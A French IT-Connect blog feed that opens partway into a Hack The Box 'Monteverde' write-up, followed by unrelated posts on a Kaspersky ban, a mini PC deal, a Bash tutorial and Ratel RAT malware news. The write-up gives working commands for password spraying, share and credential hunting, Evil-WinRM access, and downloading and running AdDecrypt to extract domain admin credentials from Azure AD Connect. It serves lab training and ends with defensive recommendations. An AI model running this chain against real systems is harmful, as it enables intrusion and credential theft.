Technique d'attaque (MITRE ATT&CK) : T1087.002 - Account Discovery: Domain Account

Enumération des utilisateurs du domaine vie un service RPC accessible en anonyme.
Enumération des utilisateurs du domaine vie un service RPC accessible en anonyme.

B. Premier accès à l'Active Directory

À présent, nous avons plusieurs logins utilisateurs valides. Il faut maintenant trouver un mot de passe valide ou un compte pour lequel aucune authentification n'est demandée. Nous allons pour cela utiliser la technique du password spraying, qui consiste à tester un seul mot de passe par compte utilisateur. Ainsi, nous allons éviter de lever des alertes de sécurité ou bloquer les comptes ciblés si une politique de verrouillage est en place.

Contrairement à une attaque par password spraying classique, dans laquelle l'attaquant teste le même mot de passe pour tous les logins cibles, nous allons ici modifier un peu l'attaque. Pour chaque compte, nous allons tenter une authentification avec le login utilisateur comme mot de passe. Cette technique, nommée user as pass, est très souvent fructueuse sur les Active DIrectory d'entreprise, souvent volumineux et avec un certain historique.

Pour réaliser cette attaque, nous allons utiliser le module "scanner/smb/smb_login" du framework d'exploitation "metasploit" :

Technique d'attaque (MITRE ATT&CK) : T1110.003 - Brute Force: Password Spraying

Réalisation d'une attaque en "user as pass" sur un service SMB via Metasploit.
Réalisation d'une attaque en "user as pass" sur un service SMB via Metasploit.

Nous venons de trouver un login vulnérable au user as pass ! Comme indiqué plus haut, cette vulnérabilité est très fréquente ! Par manque de temps ou négligence, un administrateur fini toujours par créer un compte de test ou de service avec un tel mot de passe, qu'il oublie de supprimer ou modifier. Facteur aggravant, si le compte n'est utilisé qu'une ou deux fois (classique pour un compte de test), les politiques de mots de passe paramétrées après la création ne s'appliquent pas au compte. Ainsi, le mot de passe faible persiste alors longtemps au sein de l'Active Directory.

À présent, nous allons utiliser ce compte pour voir à quel répertoire partagé il a accès sur l'Active Directory. Nous utilisons pour cela l'outil "smbmap" :

Technique d'attaque (MITRE ATT&CK) : T1135 - Network Share Discovery

$ smbmap  -u SABatchJobs -p SABatchJobs -d MEGABANK.LOCAL0 -H 10.10.10.172
[+] IP: 10.10.10.172:445    Name: 10.10.10.172                                      
    ADMIN$         NO ACCESS   Remote Admin
    azure_uploads   EEAD ONLY   
    C$           NO ACCESS Default share
    E$           NO ACCESS Default share
    IPC$         READ ONLY Remote IPC
    NETLOGON     READ ONLY  Logon server share 
    SYSVOL       READ ONLY  Logon server share 
    users$       READ ONLY 

Au-delà des répertoires classiques pour un Active Directory que sont "SYSVOL" et "NETLOGON", dont il faut toujours parcourir le contenu avec attention, nous avons également des droits de lecture sur le répertoire "user$". À présent, nous allons partir à la rechercher de données sensibles dans ces répertoires, et ce de façon automatisée.

Nous allons utiliser "manspider", un outil qui permet la recherche de fichiers et informations à partir des éléments paramétrés (nom, extension, contenu). Nous rechercherons dans un premier temps la présence du mot "password" dans les fichiers accessibles en lecture des partages :

manspider 10.10.10.172 -d megabank.local -u SABatchJobs -p SABatchJobs --content "password"

Technique d'attaque (MITRE ATT&CK) : T1552.001 - Unsecured Credentials: Credentials In Files

Après quelques secondes de recherches, "manspider" nous ressort une information intéressante : un mot de passe dans le dossier de l'utilisateur "mhope":

Recherche et découverte de fichier contenant le mot "password" via "manspider".
Recherche et découverte de fichier contenant le mot "password" via "manspider".

Testons directement ces identifiants sur tous les services exposés du système cible :

Technique d'attaque (MITRE ATT&CK) : T1021.006 - Remote Services: Windows Remote Management


*Evil-WinRM* PS C:\Users\mhope> type Desktop/user.txt
4961976b[REDACTED]212f2

L'utilisateur doit faire partir du groupe "Windows Remote Management", celui-ci peut s'authentifier sur le service winRM de la cible.

C. Attaque sur Azure AD Connect

Pour débuter notre phase de découverte avec ce nouvel identifiant, voyons s'il est membre de groupes intéressants :

Technique d'attaque (MITRE ATT&CK) : T1087.004 - Account Discovery: Cloud Account

whoami /all

Voici un extrait du retour de cette commande :

Liste des groupes locaux et domain de l'utilisateur courant.

Nous pouvons fois que l'utilisateur "mhope" fait partie du groupe "CN=Azure Admins,OU=Groups,DC=MEGABANK,DC=LOCAL". À quoi ce groupe peut-il bien servir au sein d'un environnement Windows ? Si l'on s'intéresse aux applications installées sur le système, nous pouvons également remarquer la présence d'un service Azure AD Connect :

Il s'agit du service en charge de la synchronisation des données entre l'Active Directory On Premise (celui de votre système d'information) et votre tenant Azure AD/Entra ID. Celui-ci a donc pour mission de synchroniser les identités (et donc, les mots de passe) entre ces deux environnements, il manipule forcément des données intéressantes pour un attaquant.

Pour en savoir plus sur le rôle d'Azure AD Connect, je vous oriente vers cet article :

Pour exploiter le service Azure AD Connect, je me suis basé sur ce blogpost : Azure AD Connect Database Exploit (Priv Esc). Le lien entre la présence d'un Azure AD Connect sur un système et le bon blogpost ou exploit à utiliser, peut ici ne pas paraitre évident. Nous pouvons notamment voir que le blogpost date de janvier 2020. Si l'on regarde la date d'installation d'Azure AD Connect, notamment via les binaires du répertoire d'installation, nous voyons que ceux-ci datent de 2018 :

Identification de la date de compilation des binaires et fichiers Azure AD Connect.

Ce blogpost explique donc comment récupérer les identifiants stockés et mal protégés dans la base de données (SQLExpress) d'Azure AD Connect. Il faut pour cela disposer d'un accès privilégié au serveur hébergeant l'application, ce qui est notre cas. On récupère donc le binaire en question :

Technique d'attaque (MITRE ATT&CK) : T1588.002 - Obtain Capabilities: Tool

$ wget https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip
$ unzip AdDecrypt.zip 
Archive:  AdDecrypt.zip
  inflating: AdDecrypt.exe           
  inflating: mcrypt.dll  

Technique d'attaque (MITRE ATT&CK) : T1608.002 - Stage Capabilities: Upload Tool

Puis, on le dépose sur le système via "evil-winRM" :

*Evil-WinRM* PS C:\Users\mhope\Documents> upload /tmp/AdDecrypt.exe
*Evil-WinRM* PS C:\Users\mhope\Documents> upload /tmp/mcrypt.dll

Technique d'attaque (MITRE ATT&CK) : T1068 - Exploitation for Privilege Escalation

Après avoir déposé le binaire sur le système via evil-winRM, il nous suffit de l'exécuter afin de récupérer les identifiants sensibles stockés dans la base de données d'AzureAD Connect :

*Evil-WinRM* PS C:\Users\mhope\Documents>  cd "C:\Program Files\Microsoft Azure AD Sync\bin"
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> c:\users\mhope\AdDecrypt.exe -FullSQL

Voici la sortie de cette commande, qui nous permet de retrouver les identifiants de l'administrateur du domaine :

Récupération d'identifiants privilégiés dans la base de données Azure AD Connect.

Nous pouvons donc réutiliser ces identifiants pour s'authentifier sur n'importe quel service du domaine :

Récupération du flag administrateur de la box Monteverde.

III. Résumé de l'attaque

Voici une description de l'attaque réalisée en utilisant les TTP (Tactics, Techniques and Procedures) du framework MITRE ATT&CK :

TTP (MITRE ATT&CK)Détails
T1046 - Network Service DiscoveryDécouverte des services exposés via scan réseau "nmap"
T1110.001 - Brute Force: Password GuessingAccès au service RPC en accès anonyme via "rpcclient"
T1087.002 - Account Discovery: Domain AccountRécupération de la liste des utilisateurs de l'Active Directory via le service RPC avec "rpcclient"
T1110.003 - Brute Force: Password SprayingRéalisation d'une attaque user as pass et compromission d'un compte utilisateur ("SABatchJobs") via l'outil "metasploit"
T1135 - Network Share DiscoveryDécouverte des partages réseau accessibles en tant qu'utilisateur authentifié sur le domaine ("SABatchJobs")
T1552.001 - Unsecured Credentials: Credentials In FilesRecherche et découverte du mot de passe de l'utilisateur "mhope" dans un fichier via "manspider"
T1021.006 - Remote Services: Windows Remote ManagementAccès au service "winRM" du système via "evil-winrm"
T1087.004 - Account Discovery: Cloud AccountDécouverte des groupes d'appartenance de l'utiliasteur "mhope"
T1588.002 - Obtain Capabilities: ToolRécupération d'un binaire d'exploitation depuis Internet
Dépôt de l'exploit "AdDcrypt.exe" sur le système via winRM
T1068 - Exploitation for Privilege EscalationExploitation du service Azure AD Connect pour récupérés les identifiants stockés en base de donnés

IV. Notions abordées

A. Côté attaquant

Le début de ce chemin d'attaque est assez classique et réaliste, la découverte de services acceptant l'accès anonyme suivi de la compromission de comptes à mot de passe faible au sein de l'Active Directory est une voie très courante. Également, la recherche automatisée de données sensibles dans les partages de fichiers est une opération à ne pas sous-estimer. Plus l'attaquant a accès à des répertoires et partages réseau, plus il est susceptible d'y trouver des informations sensibles (mots de passe, mais aussi configurations, clés ou documents métiers).

En tant qu'attaquant, nous tirons parti de la difficulté pour les équipes opérationnelles de vérifier le contenu des fichiers déposés par les utilisateurs, mais aussi la complexité de gérer les permissions d'accès aux différents partages réseau et répertoires. Bien souvent, un simple accès authentifiés au domaine avec un utilisateur ne faisant partie d'aucun groupe "métier" permet tout de même d'accéder à des centaines de répertoires et des milliers de fichiers.

Ici, l'important pour l'attaquant est de savoir s'outiller pour automatiser cette tâche fastidieuse mais souvent fructueuses, tout en sachant adapter ces outils à ce qu'il cherche. Ainsi, la majorité des outils permettent d'être configurés finement pour chercher parfois des extensions, parfois des noms de fichier ou encore un mot de précis dans ces fichiers.

B. Côté défenseur

Pour sécuriser ce système, nous pouvons proposer plusieurs recommandations :

Recommandation n°1 : renforcer l'authentification sur le service RPC. Il est recommandé d'interdire tout accès anonyme aux services exposés sur le réseau. Ainsi, la configuration du service RPC doit être durcie pour n'autoriser l'accès qu'aux utilisateurs authentifiés.

Recommandatoin n°2 : il est recommandé de passer en revue les comptes utilisateurs du domaine afin de vérifier que tous ont un mot de passe qui respecte les bonnes pratiques de sécurité et la politique de mot de passe. Cette vérification peut être effectuée par une revue et un durcissement de la politique de mot de passe suivi d'un renouvellement forcé du mot de passe des utilisateurs. Cette méthode permettra notamment de découvrir les comptes non utilisés (mot de passe non renouvelé) ainsi que les comptes de services qui nécessiteront un renouvellement manuel ou une désactivation.

Recommandation n°3 : il est recommandé de sensibiliser les utilisateurs aux bonnes pratiques de gestion des mots de passe. Cela afin d'éviter que des mots de passe ne se retrouvent stockés en clair dans des fichiers. Également, il est recommandé d'effectuer des analyses régulières d'informations sensibles dans les fichiers à l'aide d'outils comme Snaffler ou ManSpider. Cette recommandation fait notamment echo à la directive n°2 du Guide d'hygiène de l'ANSSI : Sensibiliser les utilisateurs aux bonnes pratiques élémentaires de sécurité informatique.

Recommandation n°4 : il est recommandé de positionner le service Azure AD Connect sur un système dédié à cette application et non sur l'Active Directory. Notamment afin que les attaques ou dysfonctionnement de l'un n'affecte pas l'autre.

J’espère que cet article vous a plu ! N'hésitez pas à donner votre avis dans les commentaires ou sur notre Discord!

Enfin, si vous voulez accéder à des cours et des modules dédiés aux techniques offensives ou défensives et améliorer vos compétences en cybersécurité, je vous oriente vers Hack The Box Academy, utilisez ce lien d'inscription (je gagnerai quelques points 🙂 ) : Tester Hack the Box Academy

The post Compromission Active Directory – Le cas de la Box Monteverde de Hack The Box first appeared on IT-Connect.

Les États-Unis ont pris la décision de bannir l’éditeur russe Kaspersky !

Il y a quelques jours, les États-Unis ont pris la décision de bannir les logiciels Kaspersky ! D'après les autorités, l'éditeur russe Kaspersky représente un risque important pour la sécurité nationale. Voici ce qu'il faut savoir !

Depuis le début du conflit entre l'Ukraine et la Russie, la situation est tendue entre les pays de l'OTAN et la Russie. Depuis mars 2022, les solutions russes (et chinoises) sont d'ailleurs particulièrement surveillées par les États-Unis. Disons que ce conflit est "la goutte d'eau qui fait déborder le vase...".

Cette fois-ci, une décision forte a été prise au sujet de l'éditeur Kaspersky et de ses solutions de sécurité : à partir du 29 septembre 2024, Kaspersky sera interdit aux États-Unis ! La situation géopolitique est liée à cette décision de bannir Kaspersky puisque les États-Unis estiment que l'éditeur russe représente un risque élevé pour la sécurité nationale.

Autrement dit, les États-Unis craignent que Kaspersky collabore avec le gouvernement russe à des fins d'espionnage. Si Moscou fait une demande d'information auprès de Kaspersky, l'éditeur pourrait être contraint d'y répondre, car c'est la juridiction du gouvernement russe qui s'applique.

De son côté, Kaspersky a répondu à ces accusations ! L'éditeur russe assure ne pas être impliqué dans la moindre activité représentant une menace pour la sécurité des États-Unis. Kaspersky estime que ces accusations seraient infondées : "Kaspersky estime que le ministère du Commerce a pris sa décision en fonction du climat géopolitique actuel et de préoccupations théoriques, plutôt que sur la base d'une évaluation complète de l'intégrité des produits et services de Kaspersky."

Kaspersky banni aux États-Unis, quelles sont les conséquences ?

Particuliers et professionnels, tous les clients de Kaspersky aux États-Unis ont moins de 3 mois pour migrer vers une nouvelle solution. Une fois que la date butoir du 29 septembre 2024 sera passée, il ne sera plus possible d'obtenir de mises à jour ou de signer de nouveaux contrats. La seule issue sera de passer sur une autre solution. Bien entendu, le gouvernement américain leur recommande de changer de solution dès maintenant.

Par ailleurs, si une organisation cherche à soutenir Kaspersky et à contourner l'interdiction, notamment pour continuer d'utiliser la solution de sécurité russe, elle serait exposée à des sanctions civiles et pénales.

Enfin, Kaspersky ne s'avoue pas vaincue et espère trouver "une solution" comme le précise le communiqué : "L'entreprise a l'intention de poursuivre toutes les options légales disponibles pour préserver ses activités et ses relations actuelles."

Source

The post Les États-Unis ont pris la décision de bannir l’éditeur russe Kaspersky ! first appeared on IT-Connect.

Bon plan – 11% de réduction sur le mini PC Geekom IT13 avec un Intel Core i7

Geekom propose une nouvelle promotion sur un mini PC : l'IT13 dans sa version avec un processeur Intel Core i7. Bénéficiez de 11% de réduction immédiate sur ce mini PC !

Chez Geekom, la série de mini PC "IT" correspond à des modèles avec un processeur Intel conçu pour être polyvalents et performants, car ils peuvent correspondre aux besoins des particuliers et des professionnels. Le modèle IT13 se décline en plusieurs versions, notamment une version avec un processeur Intel Core i9 et une autre avec un processeur Intel Core i7.

IT-Connect a eu l'occasion de tester le Geekom IT13 dans sa version avec un Intel Core i9. Voici le lien vers l'article :

11% de remise sur le Geekom IT13 avec un Core i7

Le Geekom Mini IT13 est équipé d'un processeur Intel Core i7-13620H, de 13ème génération, avec 10 cœurs et 16 threads. Ce processeur dont la fréquence turbo est de 4.90 GHz a été mis sur le marché par Intel au premier trimestre 2023. Un iGPU Intel Iris Xe assure la partie graphique.

Il est accompagné par 32 Go de RAM (DDR4) qu'il est possible d'étendre jusqu'à 64 Go, à condition de remplacer les deux barrettes de RAM déjà présentes dans le boitier. Du côté du stockage, c'est un SSD NVMe de 1 To, de marque ACER, qui a été sélectionné par Geekom. Il est à noter que le stockage est évolutif car il y a deux emplacements disponibles : 1 emplacement pour SSD SATA au format M.2 (2242 - Jusqu'à 1 To) et 1 emplacement pour disque 2.5 pouces (2 To max.)

Concernant la connectivité réseau et les ports intégrés au boitier, ce mini PC Geekom est équipé du Wi-Fi 6E, du Bluetooth 5.2, et d'un port Ethernet RJ45 en 2.5 Gbit/s. La connectique est riche puisqu'il y a de nombreux ports USB et USB-C dont 2 ports USB4, de dernière génération. Grâce à cette connectique, à laquelle s'ajoute 2 ports HDMI 2.0, ce modèle peut prendre en charge jusqu'à 4 écrans (en exploitant les ports USB4). Il est livré avec le système d'exploitation Windows 11 Pro, que vous pouvez remplacer bien entendu.

Voici un aperçu de ce boitier dont les dimensions sont les suivantes (L x W x H) : 117 mm x 112 mm x 49,2 mm.

Du 24 juin au 30 juin 2024, le Geekom IT13 (Core i7) bénéficie de 11% de réduction sur Amazon.fr ! Son prix passe de 749 euros à 664 euros, soit une réduction de près de 100 euros ! Pour en profiter, voici notre lien :

The post Bon plan – 11% de réduction sur le mini PC Geekom IT13 avec un Intel Core i7 first appeared on IT-Connect.

Script Bash : comment utiliser les conditions If, Else et Elif ?

I. Présentation

Dans ce tutoriel, nous allons apprendre à utiliser les structures conditionnelles if, else et elif en Bash ! Ce sont des notions essentielles pour ceux qui désirent écrire des scripts Bash car elles vont permettre de contrôler le flux d'exécution du script en fonction de conditions spécifiques, c'est-à-dire en fonction d'une valeur, du résultat d'une commande, etc...

Nous commencerons par évoquer la syntaxe de base de ces structures conditionnelles avant de passer à des exemples concrets pour illustrer leur utilisation dans un script Bash.

En complément de cet article, nous vous recommandons la lecture de celui-ci :

II. Syntaxe de base des instructions If, Else et Elif en Bash

D'abord, nous allons commencer par évoquer la syntaxe de ces différentes instructions. Puis, nous passerons à une mise en pratique avec différents exemples.

A. Structure du if

Premièrement, nous allons évoquer la syntaxe d'une structure conditionnelle basée uniquement sur un "if" en Bash. Ceci signifie que le code sera exécuté uniquement si la condition testée est vraie. Si elle est fausse, aucune action spécifique sera exécutée, car nous n'utilisons pas le "else".

Voici la syntaxe :

if [ condition ]
then
    # Bloc de code à exécuter si la condition est vraie
fi

Concrètement, et pour faciliter votre compréhension, nous pourrions le traduire de cette façon :

si [ la condition est vrai ]
ensuite
    # exécuter ces commandes
fin

Ce qu'il faut retenir :

  • La condition à évaluer est spécifiée entre crochet. Il est possible d'évaluer plusieurs conditions.
  • L'instruction "if" est toujours suivie par l'instruction "then", à la suite de la condition.
  • L'instruction "fi" détermine la fin de la structure conditionnelle.

B. Structure du if else

Deuxièmement, intéressons-nous à la syntaxe d'une instruction "if" couplée avec un "else", ce qui va permettre permet d'exécuter un bloc de code si une condition est vraie, et un autre bloc si cette condition est fausse.

Voici la syntaxe de base :

if [ condition ]
then
    # Bloc de code à exécuter si la condition est vraie
else
    # Bloc de code à exécuter si la condition est fausse
fi

Nous pourrions le traduire de cette façon :

si [ la condition est vrai ]
ensuite
    # exécuter ces commandes
sinon
    # exécuter ces commandes
fin

De plus, nous pouvons constater que la ligne "fi" est toujours présente à la fin, même lorsque l'instruction "else" est utilisée. Ceci est exact également avec le "elif".

C. Structure du if, elif, else

Troisièmement, pour aller plus loin, nous pouvons évaluer plusieurs conditions de façon indépendante grâce à l'utilisation de l'instruction "elif" avec "if" et "else". Ici, vous devez comprendre que le "elif" est l'équivalent du "elseif" dans d'autres langages. Nous pourrions traduire son nom par "Sinon si".

if [ condition 1 ]
then
    # Bloc de code à exécuter si la première condition est vraie
elif [ condition 2 ]
then
    # Bloc de code à exécuter si la deuxième condition est vraie
else
    # Bloc de code à exécuter si les différentes conditions sont fausses
fi

Encore une fois, nous pourrions traduire cette structure conditionnelle pour faciliter la compréhension de sa logique.

si [ cette condition est vrai ]
ensuite
    # exécuter ces commandes
sinon si [ cette condition est vrai ]
ensuite
    # exécuter ces commandes
sinon
    # exécuter ces commandes
fin

Désormais, nous allons voir comment utiliser ces différentes instructions avec plusieurs exemples pratiques.

III. Utilisation de If et Else dans un script Bash

A. Premier exemple

Pour que vous puissiez vous familiariser avec l'utilisation des instructions "if" et "else" en Bash, nous allons commencer par un exemple très simple. L'objectif est simple : associer un nombre à une valeur et vérifier s'il est supérieur à 10.

Nous allons créer le script Bash "if.sh" et ajouter le code suivant :

#!/bin/bash

# Valeur à évaluer
nombre=20

# Vérifier si le nombre est supérieur à 10
if [ $nombre -gt 10 ]
then
    echo "Le nombre est supérieur à 10."
fi

Dans cet exemple, un opérateur de comparaison est utilisé : "-gt" dont la signifie est "greater than" c'est-à-dire "plus grand que". Bien entendu, il en existe d'autres en Bash.

Puis, si nous exécutons ce script, nous pouvons constater qu'il fonctionne, car il retourne le texte "Le nombre est supérieur à 10.".

En revanche, si la condition est fausse (nombre inférieur ou égal à 10), rien ne va se passer ! Pour modifier ce comportement, nous devons ajouter une instruction "else".

Donc, nous devons modifier le code tel que précisé ci-dessous (le nombre est volontairement modifié pour le test). Vous pouvez aussi créer un nouveau script pour conserver les deux versions.

#!/bin/bash

# Valeur à évaluer
nombre=5

# Vérifier si le nombre est supérieur ou inférieur/égal à 10
if [ $nombre -gt 10 ]
then
    echo "Le nombre est supérieur à 10."
else
    echo "Le nombre est inférieur ou égal à 10."
fi

Finalement, nous obtenons bien le résultat attendu :

Script Bash - Instructions If et Else

B. Deuxième exemple

Pour terminer cette partie de l'article, nous allons évoquer un second exemple. L'objectif de ce script est d'indiquer si un fichier ou s'il n'existe pas, en prenant comme chemin à tester la valeur de la variable "fichier".

Ci-après, le bout de code correspondant. Dans cet exemple, le chemin évalué est "/home/flo/it-connect.txt".

#!/bin/bash

# Nom du fichier à tester
fichier="/home/flo/it-connect.txt"

# Vérifier si le fichier existe
if [ -e "$fichier" ]
then
    echo "Le fichier $fichier existe sur cette machine !"
else
    echo "Le fichier $fichier n'existe pas sur cette machine !"
fi

Donc, ici, il est intéressant de noter la particularité dans l'écriture de la condition puisque nous utilisons l'opérateur "-e" dans le but de vérifier si le fichier existe. Ceci pourrait fonctionner pour des éléments de différents types (fichier, répertoire, lien symbolique, etc.). De plus, pour vérifier si l'élément est un dossier, nous pouvons utiliser l'opérateur "-d" à la place de "-e".

Enfin, voici le résultat en image où nous voyons bien que le script retourne un résultat différent, en fonction de la présence ou non du fichier sur la machine.

Exemple Script Bash avec if et else

IV. Utilisation de Elif dans un script Bash : des conditions multiples

L'instruction "elif" (else if) permet de tester plusieurs conditions de façon séquentielle. Cette structure est utile lorsque vous devez vérifier plusieurs conditions différentes et exécuter différents blocs de code en fonction de chacune de ces conditions indépendantes. Autrement dit, c'est très utile pour gérer des scénarios où plusieurs conditions doivent être vérifiées successivement.

L'exemple ci-dessous sert à retourner "Bonjour" jusqu'à 13:00, "Bon après-midi" entre 13:00 et 17:00 et "Bonsoir" à partir de "17:00". Le résultat du script dépendra de l'heure de la journée. Cette information étant stockée dans la variable "heure" en tout début de script. L'intérêt de ce script étant surtout de se familiariser avec cette syntaxe.

Voici le bout de code :

#!/bin/bash

# Définir l'heure
heure=16

# Retourner un message en fonction de l'heure
if [ $heure -lt 13 ]
then
    echo "Bonjour !"
elif [ $heure -lt 17 ]
then
    echo "Bon après-midi !"
else
    echo "Bonsoir !"
fi

Ici, nous utilisons l'opérateur de comparaison "-lt" qui signifie "less than...", soit "moins que..." ou "plus petit que...".

Enfin, l'image ci-dessous montre le comportement du script en pratique. Pour effectuer plusieurs tests, modifiez simplement la valeur de la variable "heure".

Script Bash - Instruction Elif

V. Les opérateurs logiques pour combiner des conditions

En Bash, comme avec d'autres langages, nous pouvons utiliser des opérateurs logiques pour combiner plusieurs conditions dans une seule expression. Donc, cette flexibilité permet de créer des conditions plus complexes et de les vérifier en une seule instruction. Autrement dit, dans une seule instruction "if", nous allons pouvoir évaluer non pas une condition, mais plusieurs conditions.

Pour débuter, ces deux opérateurs logiques sont à connaître :

  • && correspondant à "et"
  • || correspondant à "ou"

Nous allons mettre en pratique l'opérateur "&&" dans un exemple très simple, tout en sachant que l'opérateur "||" s'utilise de la même façon. De plus, les deux peuvent être combinés, selon les besoins et scénarios d'usage.

L'exemple ci-dessous permet de déterminer si les services Apache2 et SSH sont actifs sur la machine, en récupérant l'état des deux services via systemctl. Lorsqu'un statut est actif, la commande "systemctl is-active <nom du service>" retourne la valeur "active" : une information importante pour écrire nos deux conditions au sein de l'instruction "if".

Remarque : nous utilisons l'opérateur "&&" correspondant à "et" donc nos deux conditions liées. Elles doivent être vraies toutes les deux pour que le code dans le "if" soit exécuté.

Voici le script Bash pour effectuer cette vérification :

#!/bin/bash

# Etat du service SSH
ServiceSSH=$(systemctl is-active ssh)

# Etat du service Apache2
ServiceApache2=$(systemctl is-active apache2)

# Déterminer si les services sont actifs
if [ $ServiceSSH = "active" ] && [ $ServiceApache2 = "active" ]
then
    echo "Les deux services sont en cours d'exécution"
else
    echo "ERREUR ! Statut SSH : $ServiceSSH - Statut Apache2 : $ServiceApache2"
fi

Finalement, le script retourne bien un état différent selon s'il y a les deux services actifs ou un seul des deux services. C'est bien le résultat attendu. Je vous invite à tester de votre côté.

Script Bash - If avec opérateur logique ET

VI. Conclusion

Les structures conditionnelles if, else et elif en Bash sont indispensables pour contrôler le flux d'exécution de vos scripts. Au niveau de la syntaxe, leur utilisation se résume à 5 mots clés à retenir : if, then, elif, else et fi.

Nous avons vu comment les utiliser au travers d'exemples simples, mais utiles pour une première prise en main. Inspirez-vous de ces exemples pour écrire vos scripts et sachez que vous pouvez également imbriquer les structures conditionnelles. C'est un besoin fréquent pour les scripts avancés.

Pour approfondir le sujet, vous pouvez consulter nos tutoriels Bash en utilisant le lien ci-dessous :

D'autres tutoriels sur Bash seront publiés par la suite sur IT-Connect !

The post Script Bash : comment utiliser les conditions If, Else et Elif ? first appeared on IT-Connect.

Le malware Ratel RAT chiffre les données des appareils Android obsolètes !

Ratel RAT, c'est le nom d'un malware open source utilisé par plusieurs groupes de cybercriminels pour s'attaquer en priorité aux périphériques Android obsolètes. Tel un ransomware, il chiffre les données de l'appareil et effectue une demande de rançon à l'utilisateur. Voici ce qu'il faut savoir.

Un nouveau rapport publié par les chercheurs en sécurité Antonis Terefos et Bohdan Melnykov de Check Point évoque l'utilisation de Ratel RAT dans au moins 120 campagnes d'attaques.

"Nous avons observé environ 120 campagnes malveillantes différentes, dont certaines ont réussi à cibler des organisations de premier plan, notamment dans le secteur militaire. Si la plupart des victimes ciblées étaient originaires des États-Unis, de Chine et d'Indonésie, la géographie des attaques est assez vaste.", peut-on lire dans ce rapport. La carte intégrée au rapport montre qu'il y a également eu une ou plusieurs campagnes menées en France.

Les attaques de Ratel RAT

Pour infecter les appareils, les cybercriminels tentent de convaincre les utilisateurs de télécharger un fichier APK malicieux. Ainsi, si un utilisateur passe à l'action et qu'il pense installer une application sur son smartphone, il récupérera un méchant malware nommé Ratel RAT en plus de l'application souhaitée. Ce malware se cache au sein de paquets APK permettant d'installer des applications populaires comme WhatsApp et Instagram.

Afin de pouvoir contrôler l'appareil dans son ensemble, l'application demandera de nombreuses permissions sur l'appareil. Par exemple, nous pouvons citer l'autorisation de ne pas être concerné par le processus d'optimisation de la batterie, pour être autorisé à fonctionner en arrière-plan.

Le malware prend en charge une quinzaine de commandes que les pirates peuvent exécuter à distance. Voici quelques exemples :

  • La commande "ransomware" pour chiffrer les données de l'appareil.
  • La commande "wipe" pour supprimer tous les fichiers présents à un emplacement spécifique.
  • La commande "sms_oku" pour transmettre tous les SMS au serveur C2 des pirates (redoutable pour voler les codes 2FA !)
  • La commande "LockTheScreen" pour verrouiller l'écran de l'appareil.
  • La commande "location_tracker" pour géolocaliser l'appareil et transmettre l'information en temps réel au serveur C2.

D'après Check Point, dans 10.3% des cas, la commande "ransomware" a été utilisée par les cybercriminels. Une fois les données chiffrées, une note de rançon est déposée sur l'appareil. "La note de rançon sous forme de message SMS est rédigée en arabe et fournit un canal Telegram pour poursuivre le dialogue.", peut-on lire.

Qui est vulnérable ? Quels sont les modèles pris pour cible ?

Ce logiciel malveillant est particulièrement présent sur les appareils Android dont le système n'est plus maintenu. Ceci expose ces appareils à l'exploitation de failles de sécurité connues, mais non corrigées par la marque. Ces anciennes versions sont aussi dépourvues de certains mécanismes de sécurité introduit dans Android au fil des versions.

D'après les statistiques fournies par Check Point, Android 11 est la version la plus touchée, suivi par les versions 8 et 5 d'Android. En fait, Android 11 et les versions antérieures représentent plus de 87,5 % du total d'appareils infectés. Ceci signifie qu'il y a tout de même des victimes dont l'appareil tourne sur Android 12 ou 13.

"Plus de 87 % des victimes concernées utilisent des versions d'Android qui ne sont plus prises en charge et qui, par conséquent, ne reçoivent pas de correctifs de sécurité.", précise le rapport. Une nouvelle fois, ces attaques mettent en lumière le problème de suivi des mises à jour Android ainsi que le fort fractionnement dans les versions d'Android utilisées sur les appareils. Chaque constructeur a sa politique de suivi des smartphones, sur un nombre d'années plus ou moins important.

Néanmoins, ces attaques ne ciblent pas une marque particulière, puisqu'il y a aussi des appareils Google Pixel, que Samsung Galaxy A et S, ou encore des appareils Xiaomi.

Source : Check Point

En résumé, en restant vigilant, et en ne téléchargeant pas d'applications en dehors des magasins d'applications officiels, vous pouvez éviter ce genre de menace. Ratel RAT, en plus d'offrir un accès à distance à votre appareil, représente un gros risque pour vos données et vos informations personnelles.

Source

The post Le malware Ratel RAT chiffre les données des appareils Android obsolètes ! first appeared on IT-Connect.

❌